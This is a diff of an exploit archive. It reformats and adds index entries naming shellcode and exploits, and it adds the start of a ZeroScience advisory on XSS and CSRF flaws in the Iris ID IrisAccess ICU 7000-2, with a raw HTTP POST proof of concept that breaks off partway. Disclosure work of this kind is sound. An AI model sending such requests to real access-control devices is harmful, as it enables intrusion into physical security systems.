diff --git a/files.csv b/files.csv
index b7a8b4ddf..6863aeff1 100755
--- a/files.csv
+++ b/files.csv
@@ -9593,7 +9593,7 @@ id,file,description,date,author,platform,type,port
 10299,platforms/php/webapps/10299.txt,"GeN3 forum 1.3 - SQL Injection",2009-12-04,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
 10302,platforms/php/webapps/10302.txt,"427BB Fourtwosevenbb <= 2.3.2 - SQL Injection Exploit",2009-12-04,"cr4wl3r ",php,webapps,0
 10303,platforms/windows/dos/10303.py,"Core FTP Server 1.0 Build 319 - Denial of Service",2009-12-04,"Mert SARICA",windows,dos,0
-10304,platforms/php/webapps/10304.txt,"Invision Power Board <= 3.0.4_ <= 3.0.4_ <= 2.3.6 - LFI and SQL Injection",2009-12-04,"Dawid Golunski",php,webapps,0
+10304,platforms/php/webapps/10304.txt,"Invision Power Board <= 3.0.4 / <= 3.0.4 / <= 2.3.6 - LFI and SQL Injection",2009-12-04,"Dawid Golunski",php,webapps,0
 10305,platforms/php/webapps/10305.txt,"UBB.threads 7.5.4 2 - Multiple File Inclusion Vulnerabilities",2009-12-04,R3VAN_BASTARD,php,webapps,0
 10306,platforms/php/webapps/10306.txt,"Achievo 1.4.2 - Arbitrary File Upload",2009-12-04,"Nahuel Grisolia",php,webapps,0
 10307,platforms/php/webapps/10307.txt,"Achievo 1.4.2 Permanent Cross-Site Scripting",2009-12-04,"Nahuel Grisolia",php,webapps,0
@@ -11813,7 +11813,7 @@ id,file,description,date,author,platform,type,port
 13334,platforms/lin_x86/shellcode/13334.txt,"Linux/x86 - setresuid(0_0_0) /bin/sh shellcode (35 bytes)",2008-09-29,sorrow,lin_x86,shellcode,0
 13335,platforms/lin_x86/shellcode/13335.c,"Linux/x86 - iopl(3); asm(cli); while(1){} shellcode (12 bytes)",2008-09-17,dun,lin_x86,shellcode,0
 13336,platforms/lin_x86/shellcode/13336.c,"Linux/x86 - system-beep shellcode (45 bytes)",2008-09-09,"Thomas Rinsma",lin_x86,shellcode,0
-13337,platforms/lin_x86/shellcode/13337.c,"Linux/x86 - connect back (140.115.53.35:9999)_ download a file (cb) and execute shellcode (149 bytes)",2008-08-25,militan,lin_x86,shellcode,0
+13337,platforms/lin_x86/shellcode/13337.c,"Linux/x86 - Connect back (140.115.53.35:9999)_ download a file (cb) and execute shellcode (149 bytes)",2008-08-25,militan,lin_x86,shellcode,0
 13338,platforms/lin_x86/shellcode/13338.c,"Linux/x86 - setreuid(geteuid_ geteuid) + execve(/bin/sh) shellcode (39 bytes)",2008-08-19,Reth,lin_x86,shellcode,0
 13339,platforms/lin_x86/shellcode/13339.asm,"Linux/x86 - connect back (Port )8192.send.exit /etc/shadow shellcode (155 bytes)",2008-08-18,0in,lin_x86,shellcode,0
 13340,platforms/lin_x86/shellcode/13340.c,"Linux/x86 - writes a php connectback shell (/var/www/cb.php) to the filesystem shellcode (508 bytes)",2008-08-18,GS2008,lin_x86,shellcode,0
@@ -11872,7 +11872,7 @@ id,file,description,date,author,platform,type,port
 13393,platforms/lin_x86/shellcode/13393.c,"Linux/x86 - Connect-back shellcode 127.0.0.1:31337/TCP (74 bytes)",2006-01-21,izik,lin_x86,shellcode,0
 13394,platforms/lin_x86/shellcode/13394.c,"Linux/x86 - normal exit with random (so to speak) return value shellcode (5 bytes)",2006-01-21,izik,lin_x86,shellcode,0
 13395,platforms/lin_x86/shellcode/13395.c,"Linux/x86 - getppid() + execve(/proc/pid/exe) shellcode (51 bytes)",2006-01-21,izik,lin_x86,shellcode,0
-13396,platforms/lin_x86/shellcode/13396.c,"Linux/x86 - quick (yet conditional_ eax != 0 and edx == 0) exit shellcode (4 bytes)",2006-01-21,izik,lin_x86,shellcode,0
+13396,platforms/lin_x86/shellcode/13396.c,"Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) exit shellcode (4 bytes)",2006-01-21,izik,lin_x86,shellcode,0
 13397,platforms/lin_x86/shellcode/13397.c,"Linux/x86 - reboot() shellcode (20 bytes)",2006-01-21,izik,lin_x86,shellcode,0
 13398,platforms/lin_x86/shellcode/13398.c,"Linux/x86 - setreuid(0_ 0) + execve(/bin/sh) shellcode (31 bytes)",2006-01-21,izik,lin_x86,shellcode,0
 13399,platforms/lin_x86/shellcode/13399.c,"Linux/x86 - execve(/bin/sh) / PUSH shellcode (23 bytes)",2006-01-21,izik,lin_x86,shellcode,0
@@ -11992,7 +11992,7 @@ id,file,description,date,author,platform,type,port
 13511,platforms/win_x86/shellcode/13511.c,"Win32/XP SP2 - cmd.exe shellcode (57 bytes)",2009-02-03,Stack,win_x86,shellcode,0
 13512,platforms/win_x86/shellcode/13512.c,"Win32 - PEB Kernel32.dll ImageBase Finder Alphanumeric shellcode (67 bytes)",2008-09-03,Koshi,win_x86,shellcode,0
 13513,platforms/win_x86/shellcode/13513.c,"Win32 - PEB Kernel32.dll ImageBase Finder (ASCII Printable) shellcode (49 bytes)",2008-09-03,Koshi,win_x86,shellcode,0
-13514,platforms/win_x86/shellcode/13514.asm,"Win32 - connectback_ receive_ save and execute shellcode",2008-08-25,loco,win_x86,shellcode,0
+13514,platforms/win_x86/shellcode/13514.asm,"Win32 - Connectback_ receive_ save and execute shellcode",2008-08-25,loco,win_x86,shellcode,0
 13515,platforms/win_x86/shellcode/13515.pl,"Win32 - Download and Execute Shellcode (Generator) (Browsers Edition) (275+ bytes)",2008-03-14,"YAG KOHHA",win_x86,shellcode,0
 13516,platforms/win_x86/shellcode/13516.asm,"Win32 - Tiny Download and Exec Shellcode (192 bytes)",2007-06-27,czy,win_x86,shellcode,0
 13517,platforms/win_x86/shellcode/13517.asm,"Win32 - download and execute shellcode (124 bytes)",2007-06-14,Weiss,win_x86,shellcode,0
@@ -15413,14 +15413,14 @@ id,file,description,date,author,platform,type,port
 17742,platforms/windows/dos/17742.py,"Mini FTP Server 1.1 - Buffer Corruption Remote Denial of Service",2011-08-28,LiquidWorm,windows,dos,0
 17743,platforms/php/webapps/17743.rb,"LifeSize Room - Command Injection",2011-08-28,"Spencer McIntyre",php,webapps,0
 17744,platforms/windows/local/17744.pl,"Mini-stream Ripper 2.9.7.273 - (.m3u) Universal BoF",2011-08-29,"D3r K0n!G",windows,local,0
-17745,platforms/windows/local/17745.pl,"DVD X Player 5.5 Professional (.plf) Universal Buffer Overflow",2011-08-29,"D3r K0n!G",windows,local,0
+17745,platforms/windows/local/17745.pl,"DVD X Player 5.5 Professional - (.plf) Universal Buffer Overflow",2011-08-29,"D3r K0n!G",windows,local,0
 17748,platforms/php/webapps/17748.txt,"WordPress SH Slideshow plugin <= 3.1.4 - SQL Injection",2011-08-29,"Miroslav Stampar",php,webapps,0
 17749,platforms/php/webapps/17749.txt,"WordPress iCopyright(R) Article Tools plugin <= 1.1.4 - SQL Injection",2011-08-29,"Miroslav Stampar",php,webapps,0
 17750,platforms/php/webapps/17750.txt,"WordPress Advertizer plugin <= 1.0 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0
 17751,platforms/php/webapps/17751.txt,"WordPress Event Registration plugin <= 5.4.3 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0
 17752,platforms/php/webapps/17752.txt,"vAuthenticate 3.0.1 - Authentication Bypass",2011-08-30,bd0rk,php,webapps,0
 17753,platforms/php/webapps/17753.txt,"FileBox - File Hosting & Sharing Script 1.5 - SQL Injection",2011-08-30,SubhashDasyam,php,webapps,0
-17754,platforms/windows/local/17754.c,"DVD X Player 5.5.0 Pro / Standard - Universal Exploit (DEP+ASLR Bypass)",2011-08-30,sickness,windows,local,0
+17754,platforms/windows/local/17754.c,"DVD X Player 5.5.0 Pro / Standard - Universal Exploit (DEP + ASLR Bypass)",2011-08-30,sickness,windows,local,0
 17755,platforms/php/webapps/17755.txt,"WordPress Crawl Rate Tracker plugin <= 2.0.2 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0
 17756,platforms/php/webapps/17756.txt,"WordPress Plugin audio gallery playlist <= 0.12 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0
 17757,platforms/php/webapps/17757.txt,"WordPress yolink Search plugin <= 1.1.4 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0
@@ -16983,7 +16983,7 @@ id,file,description,date,author,platform,type,port
 19612,platforms/windows/remote/19612.pl,"Trend Micro InterScan VirusWall 3.2.3/3.3 Long HELO Buffer Overflow (1)",1999-11-07,"Alain Thivillon & Stephane Aubert",windows,remote,0
 19613,platforms/windows/remote/19613.rb,"Poison Ivy 2.3.2 C&C Server Buffer Overflow",2012-07-06,Metasploit,windows,remote,3460
 19614,platforms/windows/remote/19614.asm,"Trend Micro InterScan VirusWall 3.2.3/3.3 Long HELO Buffer Overflow (2)",1999-11-07,"dark spyrit",windows,remote,0
-19615,platforms/unix/dos/19615.c,"ISC BIND <= 8.2.2_IRIX <= 6.5.17_Solaris 7.0 - (NXT Overflow and Denial of Service) Vulnerabilities",1999-11-10,"ADM Crew",unix,dos,0
+19615,platforms/unix/dos/19615.c,"ISC BIND <= 8.2.2 / IRIX <= 6.5.17 / Solaris 7.0 - (NXT Overflow and Denial of Service) Vulnerabilities",1999-11-10,"ADM Crew",unix,dos,0
 19616,platforms/windows/dos/19616.c,"Ipswitch IMail 5.0.5/5.0.6/5.0.7 - POP3 Denial of Service (Possible Buffer Overflow)",1999-11-08,Interrupt,windows,dos,0
 19617,platforms/windows/remote/19617.txt,"NetcPlus SmartServer3 3.5.1 POP Buffer Overflow",1999-11-11,"Ussr Labs",windows,remote,0
 19618,platforms/windows/remote/19618.txt,"Microsoft Internet Explorer 5.0 Media Player ActiveX Error Message",1999-11-14,"Georgi Guninski",windows,remote,0
@@ -26800,7 +26800,7 @@ id,file,description,date,author,platform,type,port
 29758,platforms/php/webapps/29758.txt,"PHPX 3.5.15/3.5.16 users.php user_id Parameter SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0
 29759,platforms/php/webapps/29759.php,"PHPX 3.5.15/3.5.16 news.php Multiple Parameter SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0
 29760,platforms/php/webapps/29760.txt,"PHPX 3.5.15/3.5.16 gallery.php Multiple Parameter SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0
-29761,platforms/cgi/webapps/29761.txt,"LedgerSMB1.0/1.1_SQL-Ledger 2.6.x Login Parameter Local File Include And Authentication Bypass Vulnerabilities",2007-03-19,"Chris Travers",cgi,webapps,0
+29761,platforms/cgi/webapps/29761.txt,"LedgerSMB1.0/1.1 / SQL-Ledger 2.6.x - Login Parameter Local File Include And Authentication Bypass Vulnerabilities",2007-03-19,"Chris Travers",cgi,webapps,0
 29762,platforms/php/webapps/29762.txt,"Web Wiz Forums 8.05 String Filtering SQL Injection",2007-03-20,"Ivan Fratric",php,webapps,0
 29763,platforms/php/webapps/29763.php,"W-Agora 4.2.1 - Multiple Arbitrary File Upload Vulnerabilities",2007-03-20,"laurent gaffie",php,webapps,0
 29764,platforms/php/webapps/29764.txt,"W-Agora 4.2.1 profile.php showuser Parameter XSS",2007-03-20,"laurent gaffie",php,webapps,0
@@ -27252,7 +27252,7 @@ id,file,description,date,author,platform,type,port
 30319,platforms/linux/remote/30319.c,"tcpdump Print-bgp.C Remote Integer Underflow",2007-03-01,mu-b,linux,remote,0
 30320,platforms/php/webapps/30320.txt,"geoBlog MOD_1.0 deletecomment.php id Variable Remote Arbitrary Comment Deletion",2007-07-19,joseph.giron13,php,webapps,0
 30321,platforms/php/webapps/30321.txt,"geoBlog MOD_1.0 deleteblog.php id Variable Remote Arbitrary Blog Deletion",2007-07-19,joseph.giron13,php,webapps,0
-30322,platforms/windows/remote/30322.rb,"Lighttpd <= 1.4.15 - Multiple Code Execution_ Denial of Service and Information Disclosure Vulnerabilities",2007-04-16,"Abhisek Datta",windows,remote,0
+30322,platforms/windows/remote/30322.rb,"Lighttpd <= 1.4.15 - Multiple Code Execution + Denial of Service + Information Disclosure Vulnerabilities",2007-04-16,"Abhisek Datta",windows,remote,0
 30323,platforms/php/webapps/30323.txt,"UseBB 1.0.7 install/upgrade-0-2-3.php PHP_SELF Parameter XSS",2007-07-20,s4mi,php,webapps,0
 30324,platforms/php/webapps/30324.txt,"UseBB 1.0.7 install/upgrade-0-3.php PHP_SELF Parameter XSS",2007-07-20,s4mi,php,webapps,0
 30978,platforms/php/webapps/30978.txt,"WordPress <= 2.2.3 - wp-admin/page-new.php popuptitle Parameter XSS",2008-01-03,3APA3A,php,webapps,0
@@ -30877,7 +30877,7 @@ id,file,description,date,author,platform,type,port
 34269,platforms/php/webapps/34269.txt,"Pligg 1.0.4 - 'install1.php' Cross-Site Scripting",2010-07-07,"Andrei Rimsa Alvares",php,webapps,0
 34270,platforms/multiple/dos/34270.txt,"Ubisoft Ghost Recon Advanced Warfighter - Integer Overflow and Array Indexing Overflow Vulnerabilities",2010-07-07,"Luigi Auriemma",multiple,dos,0
 34271,platforms/multiple/remote/34271.txt,"id Software id Tech 4 Engine 'key' Packet Remote Code Execution",2010-07-05,"Luigi Auriemma",multiple,remote,0
-34272,platforms/windows/local/34272.py,"Symantec Endpoint Protection 11.x/12.x - Kernel Pool Overflow",2014-08-05,"ryujin & sickness",windows,local,0
+34272,platforms/windows/local/34272.py,"Symantec Endpoint Protection 11.x/12.x - Kernel Pool Overflow Privilege Escalation",2014-08-05,"ryujin & sickness",windows,local,0
 34273,platforms/php/webapps/34273.txt,"HybridAuth 2.2.2 - Remote Code Execution",2014-08-06,@u0x,php,webapps,80
 34278,platforms/linux/dos/34278.txt,"LibTIFF <= 3.9.4 - Out-Of-Order Tag Type Mismatch Remote Denial of Service",2010-07-12,"Tom Lane",linux,dos,0
 34279,platforms/linux/dos/34279.txt,"LibTIFF <= 3.9.4 - Unknown Tag Second Pass Processing Remote Denial of Service",2010-06-14,"Tom Lane",linux,dos,0
@@ -31624,12 +31624,12 @@ id,file,description,date,author,platform,type,port
 35098,platforms/php/webapps/35098.txt,"Enalean Tuleap 7.4.99.5 - Blind SQL Injection",2014-10-28,Portcullis,php,webapps,80
 35099,platforms/php/webapps/35099.txt,"Enalean Tuleap 7.2 - XXE File Disclosure",2014-10-28,Portcullis,php,webapps,80
 35100,platforms/php/webapps/35100.txt,"Enalean Tuleap 7.4.99.5 - Remote Command Execution",2014-10-28,Portcullis,php,webapps,80
-35101,platforms/windows/local/35101.rb,"Windows TrackPopupMenu Win32k NULL Pointer Dereference",2014-10-28,Metasploit,windows,local,0
+35101,platforms/windows/local/35101.rb,"Windows - TrackPopupMenu Win32k NULL Pointer Dereference",2014-10-28,Metasploit,windows,local,0
 35102,platforms/php/webapps/35102.py,"Tapatalk for vBulletin 4.x - Blind SQL Injection (Pre-Auth)",2014-10-28,tintinweb,php,webapps,80
 35214,platforms/multiple/webapps/35214.txt,"Subex Fms 7.4 - Unauthenticated SQLi",2014-11-11,"Anastasios Monachos",multiple,webapps,0
 35103,platforms/hardware/remote/35103.txt,"Konke Smart Plug K - Authentication Bypass",2014-10-29,gamehacker,hardware,remote,0
 35105,platforms/windows/dos/35105.pl,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - (.wax) Buffer Overflow/DoS EIP Overwrite",2014-10-29,"ZoRLu Bugrahan",windows,dos,0
-35209,platforms/jsp/webapps/35209.txt,"ManageEngine OpManager_ Social IT Plus and IT360 - Multiple Vulnerabilities",2014-11-10,"Pedro Ribeiro",jsp,webapps,0
+35209,platforms/jsp/webapps/35209.txt,"ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities",2014-11-10,"Pedro Ribeiro",jsp,webapps,0
 35106,platforms/php/webapps/35106.txt,"Cetera eCommerce 'banner.php' Cross-Site Scripting",2010-12-11,MustLive,php,webapps,0
 35107,platforms/cfm/webapps/35107.txt,"Mura CMS - Multiple Cross-Site Scripting Vulnerabilities",2010-12-13,"Richard Brain",cfm,webapps,0
 35108,platforms/php/webapps/35108.txt,"MyBB <= 1.4.10 - 'tags.php' Cross-Site Scripting",2010-12-12,TEAMELITE,php,webapps,0
@@ -31849,7 +31849,7 @@ id,file,description,date,author,platform,type,port
 35347,platforms/php/webapps/35347.txt,"Dokeos 1.8.6 2 - 'style' Parameter Cross-Site Scripting",2011-02-12,"AutoSec Tools",php,webapps,0
 35348,platforms/php/webapps/35348.txt,"MG2 0.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-15,LiquidWorm,php,webapps,0
 35349,platforms/php/webapps/35349.txt,"Gollos 2.8 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0
-35350,platforms/php/webapps/35350.txt,"Wikipad 1.6.0 - Cross-Site Scripting_ HTML Injection and Information Disclosure Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0
+35350,platforms/php/webapps/35350.txt,"Wikipad 1.6.0 - Cross-Site Scripting + HTML Injection + Information Disclosure Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0
 35351,platforms/php/webapps/35351.txt,"Photopad 1.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0
 35352,platforms/multiple/remote/35352.rb,"Ruby on Rails 3.0.5 - 'WEBrick::HTTPRequest' Module HTTP Header Injection",2011-02-16,"Jimmy Bandit",multiple,remote,0
 35353,platforms/php/webapps/35353.txt,"GetSimple CMS 2.03 - 'admin/upload-ajax.php' Remote Arbitrary File Upload",2011-02-15,"s3rg3770 and Chuzz",php,webapps,0
@@ -33488,7 +33488,7 @@ id,file,description,date,author,platform,type,port
 37100,platforms/php/webapps/37100.txt,"Waylu CMS 'products_xx.php' SQL Injection and HTML Injection Vulnerabilities",2012-04-20,TheCyberNuxbie,php,webapps,0
 37101,platforms/php/webapps/37101.txt,"Joomla CCNewsLetter Module 1.0.7 - 'id' Parameter SQL Injection",2012-04-23,E1nzte1N,php,webapps,0
 37102,platforms/php/webapps/37102.txt,"Joomla! Video Gallery component Local File Include and SQL Injection Vulnerabilities",2012-04-24,KedAns-Dz,php,webapps,0
-37103,platforms/php/webapps/37103.txt,"concrete5 5.5.2.1 Information Disclosure_ SQL Injection and Cross Site Scripting Vulnerabilities",2012-04-26,"Jakub Galczyk",php,webapps,0
+37103,platforms/php/webapps/37103.txt,"concrete5 5.5.2.1 - Information Disclosure + SQL Injection + Cross Site Scripting Vulnerabilities",2012-04-26,"Jakub Galczyk",php,webapps,0
 37104,platforms/php/webapps/37104.txt,"gpEasy 2.3.3 - 'jsoncallback' Parameter Cross Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0
 37105,platforms/php/webapps/37105.txt,"Quick.CMS 4.0 - 'p' Parameter Cross Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0
 37106,platforms/php/webapps/37106.txt,"WordPress Video Gallery Plugin 2.8 Arbitrary Mail Relay",2015-05-26,"Claudio Viviani",php,webapps,80
@@ -33635,7 +33635,7 @@ id,file,description,date,author,platform,type,port
 37305,platforms/php/webapps/37305.txt,"Plogger Photo Gallery SQL Injection",2012-05-22,"Eyup CELIK",php,webapps,0
 37306,platforms/linux/dos/37306.txt,"Mosh Remote Denial of Service",2012-05-22,"Timo Juhani Lindfors",linux,dos,0
 37307,platforms/php/webapps/37307.txt,"phphq.Net phAlbum 1.5.1 - 'index.php' Cross Site Scripting",2012-05-21,"Eyup CELIK",php,webapps,0
-37308,platforms/php/webapps/37308.txt,"RuubikCMS 1.1.x Cross Site Scripting_ Information Disclosure and Directory Traversal Vulnerabilities",2012-05-23,AkaStep,php,webapps,0
+37308,platforms/php/webapps/37308.txt,"RuubikCMS 1.1.x - Cross Site Scripting + Information Disclosure + Directory Traversal Vulnerabilities",2012-05-23,AkaStep,php,webapps,0
 37309,platforms/php/webapps/37309.txt,"phpCollab 2.5 Database Backup Information Disclosure",2012-05-23,"team ' and 1=1--",php,webapps,0
 37310,platforms/php/webapps/37310.txt,"Ajaxmint Gallery 1.0 Local File Include",2012-05-23,AkaStep,php,webapps,0
 37311,platforms/php/webapps/37311.txt,"Pligg CMS 1.x module.php Multiple Parameter XSS",2012-05-23,"High-Tech Bridge SA",php,webapps,0
@@ -35878,7 +35878,7 @@ id,file,description,date,author,platform,type,port
 39659,platforms/hardware/webapps/39659.txt,"PQI Air Pen Express 6W51-0000R2 / 6W51-0000R2XXX - Multiple Vulnerabilities",2016-04-04,Orwelllabs,hardware,webapps,0
 39663,platforms/windows/dos/39663.html,"Internet Explorer - MSHTML!CSVGHelpers::SetAttributeStringAndPointer Use-After-Free (MS16-023)",2016-04-05,"Google Security Research",windows,dos,0
 39664,platforms/jsp/webapps/39664.txt,"ManageEngine Password Manager Pro 8102 to 8302 - Multiple Vulnerabilities",2016-04-05,S3ba,jsp,webapps,7272
-39666,platforms/windows/local/39666.txt,"Windows Kernel Win32k.sys Privilege Escalation Exploit (MS14-058)",2016-04-05,"MWR InfoSecurity",windows,local,0
+39666,platforms/windows/local/39666.txt,"Windows Kernel - Win32k.sys Privilege Escalation Exploit (MS14-058)",2016-04-05,"MWR InfoSecurity",windows,local,0
 39667,platforms/jsp/webapps/39667.txt,"Asbru Web Content Management System 9.2.7 - Multiple Vulnerabilities",2016-04-06,LiquidWorm,jsp,webapps,80
 39668,platforms/php/webapps/39668.txt,"SocialEngine 4.8.9 - SQL Injection",2016-04-06,"High-Tech Bridge SA",php,webapps,80
 39669,platforms/linux/dos/39669.txt,"Linux x86 - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited",2016-04-06,"Hector Marco and Ismael Ripoll",linux,dos,0
@@ -36081,7 +36081,7 @@ id,file,description,date,author,platform,type,port
 39875,platforms/linux/dos/39875.py,"TCPDump 4.5.1 - Crash PoC",2016-05-31,"David Silveiro",linux,dos,0
 39876,platforms/php/webapps/39876.txt,"AjaxExplorer 1.10.3.2 - Multiple Vulnerabilities",2016-06-01,hyp3rlinx,php,webapps,80
 39877,platforms/multiple/dos/39877.txt,"Wireshark - erf_meta_read_tag SIGSEGV",2016-06-01,"Google Security Research",multiple,dos,0
-39965,platforms/php/webapps/39965.txt,"Tiki-Wiki CMS Calendar 14.2_ 12.5 LTS_ 9.11 LTS_ and 6.15 - Remote Code Execution",2016-06-16,"Dany Ouellet",php,webapps,80
+39965,platforms/php/webapps/39965.txt,"Tiki-Wiki CMS Calendar 14.2 / 12.5 LTS / 9.11 LTS / 6.15 - Remote Code Execution",2016-06-16,"Dany Ouellet",php,webapps,80
 39879,platforms/php/webapps/39879.txt,"Joomla SecurityCheck Extension 2.8.9 - Multiple Vulnerabilities",2016-06-02,"ADEO Security",php,webapps,80
 39880,platforms/jsp/webapps/39880.txt,"Liferay CE < 6.2 CE GA6 - Stored XSS",2016-06-02,"Fernando Câmara",jsp,webapps,0
 39881,platforms/php/webapps/39881.txt,"Relay Ajax Directory Manager relayb01-071706_ 1.5.1_ 1.5.3 - Unauthenticated File Upload",2016-06-02,"RedTeam Pentesting GmbH",php,webapps,80
@@ -36308,10 +36308,15 @@ id,file,description,date,author,platform,type,port
 40151,platforms/windows/local/40151.py,"CoolPlayer+ Portable 2.19.6 - .m3u Stack Overflow (Egghunter+ASLR bypass)",2016-07-25,"Karn Ganeshen",windows,local,0
 40153,platforms/php/webapps/40153.txt,"GRR Système de Gestion et de Réservations de Ressources 3.0.0-RC1 - Arbitrary File Upload",2016-07-25,kmkz,php,webapps,80
 40154,platforms/php/webapps/40154.txt,"PHP gettext (gettext.php) 1.0.12 - Unauthenticated Code Execution",2016-07-25,kmkz,php,webapps,0
-40155,platforms/php/dos/40155.txt,"PHP 7.0.8_ 5.6.23 and 5.5.37 - bzread() Out-of-Bounds Write",2016-07-25,"Hans Jerry Illikainen",php,dos,80
+40155,platforms/php/dos/40155.py,"PHP 7.0.8 / 5.6.23 / 5.5.37 - bzread() Out-of-Bounds Write",2016-07-25,"Hans Jerry Illikainen",php,dos,80
 40156,platforms/cgi/webapps/40156.py,"Ubee EVW3226 Modem/Router 1.0.20 - Multiple Vulnerabilities",2016-07-25,"Gergely Eberhardt",cgi,webapps,80
 40157,platforms/cgi/webapps/40157.py,"Technicolor TC7200 Modem/Router STD6.02.11 - Multiple Vulnerabilities",2016-07-25,"Gergely Eberhardt",cgi,webapps,80
 40158,platforms/hardware/webapps/40158.txt,"Hitron CGNV4 Modem/Router 4.3.9.9-SIP-UPC - Multiple Vulnerabilities",2016-07-25,"Gergely Eberhardt",hardware,webapps,80
 40159,platforms/hardware/webapps/40159.txt,"Compal CH7465LG-LC Modem/Router CH7465LG-NCIP-4.50.18.13-NOSH - Multiple Vulnerabilities",2016-07-25,"Gergely Eberhardt",hardware,webapps,80
 40160,platforms/hardware/webapps/40160.py,"Bellini/Supercook Wi-Fi Yumi SC200 - Multiple Vulnerabilities",2016-07-25,"James McLean",hardware,webapps,0
 40161,platforms/java/webapps/40161.txt,"Micro Focus Filr 2 2.0.0.421_ Filr 1.2 1.2.0.846 - Multiple Vulnerabilities",2016-07-25,"SEC Consult",java,webapps,9443
+40162,platforms/linux/remote/40162.rb,"Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Post Auth Remote Root Exploit (Metasploit)",2016-07-26,xort,linux,remote,8000
+40163,platforms/php/webapps/40163.txt,"PHP File Vault 0.9 - Directory Traversal",2016-07-26,N_A,php,webapps,80
+40165,platforms/cgi/webapps/40165.txt,"Iris ID IrisAccess ICU 7000-2 - Multiple Vulnerabilities",2016-07-26,LiquidWorm,cgi,webapps,80
+40166,platforms/cgi/webapps/40166.txt,"Iris ID IrisAccess ICU 7000-2 - Remote Root Command Execution",2016-07-26,LiquidWorm,cgi,webapps,80
+40167,platforms/linux/remote/40167.txt,"Iris ID IrisAccess iCAM4000/iCAM7000 - Hardcoded Credentials Remote Shell Access",2016-07-26,LiquidWorm,linux,remote,23
diff --git a/platforms/cgi/webapps/40165.txt b/platforms/cgi/webapps/40165.txt
new file mode 100755
index 000000000..1e81b4067
--- /dev/null
+++ b/platforms/cgi/webapps/40165.txt
@@ -0,0 +1,149 @@ + +Iris ID IrisAccess ICU 7000-2 Multiple XSS and CSRF Vulnerabilities + + +Vendor: Iris ID, Inc. +Product web page: http://www.irisid.com +Affected version: ICU Software: 1.00.08 + ICU OS: 1.3.8 + ICU File system: 1.3.8 + EIF Firmware [Channel 1]: 1.9 + EIF Firmware [Channel 2]: 1.9 + Iris TwoPi: 1.4.5 + +Summary: The ICU 7000-2 is an optional component used when the client requires +iris template data to be matched on the secure side of the door. When using ICU +no data is stored in the iCAM7 Iris Reader itself. The ICU also ensures that portal +operation can continue if the there is an interruption in communication with the +host computer. In such circumstances, the ICU retains the records of portal activity, +then automatically updates the host upon resumption of host communication. Every +ICU in the iCAM4000 / 7 series runs on a LINUX OS for added reliability. Independent +and fault tolerant, ICUs are connected up to 2 iCAMs and handle up to 100,000 users. + +Desc: The application is prone to multiple reflected cross-site scripting vulnerabilities +due to a failure to properly sanitize user-supplied input to the 'HidChannelID' and +'HidVerForPHP' POST parameters in the 'SetSmarcardSettings.php' script. Attackers can +exploit this issue to execute arbitrary HTML and script code in a user's browser session. +The application also allows users to perform certain actions via HTTP requests without +performing any validity checks to verify the requests. This can be exploited to perform +certain actions with administrative privileges if a logged-in user visits a malicious web +site. 
+ +Tested on: GNU/Linux 3.0.51 (armv7l) + mylighttpd v1.0 + PHP/5.5.13 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2016-5345 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5345.php + + +06.05.2016 + +-- + + +XSS PoC: +-------- + +POST /html/SetSmarcardSettings.php HTTP/1.1 +Host: 10.0.0.17 +Connection: close +Content-Length: x +Cache-Control: max-age=0 +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzczxmPRCR0fYr2SO +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Encoding: gzip, deflate, br +Accept-Language: en-US,en;q=0.8 + +------WebKitFormBoundaryzczxmPRCR0fYr2SO +Content-Disposition: form-data; name="HidChannelID" + +2"> +------WebKitFormBoundaryzczxmPRCR0fYr2SO +Content-Disposition: form-data; name="HidcmbBook" + +0 +------WebKitFormBoundaryzczxmPRCR0fYr2SO +Content-Disposition: form-data; name="cmbBook" + +0 +------WebKitFormBoundaryzczxmPRCR0fYr2SO +Content-Disposition: form-data; name="HidDisOffSet" + +13 +------WebKitFormBoundaryzczxmPRCR0fYr2SO +Content-Disposition: form-data; name="txtOffSet" + +13 +------WebKitFormBoundaryzczxmPRCR0fYr2SO +Content-Disposition: form-data; name="HidDataFormat" + +1 +------WebKitFormBoundaryzczxmPRCR0fYr2SO +Content-Disposition: form-data; name="HidDataFormatVal" + +1 +------WebKitFormBoundaryzczxmPRCR0fYr2SO +Content-Disposition: form-data; name="DataFormat" + +1 +------WebKitFormBoundaryzczxmPRCR0fYr2SO +Content-Disposition: form-data; name="HidFileAvailable" + +0 +------WebKitFormBoundaryzczxmPRCR0fYr2SO +Content-Disposition: form-data; name="HidEncryAlg" + +0 +------WebKitFormBoundaryzczxmPRCR0fYr2SO +Content-Disposition: form-data; name="EncryAlg" + +0 +------WebKitFormBoundaryzczxmPRCR0fYr2SO +Content-Disposition: form-data; name="HidFileType" + +0 
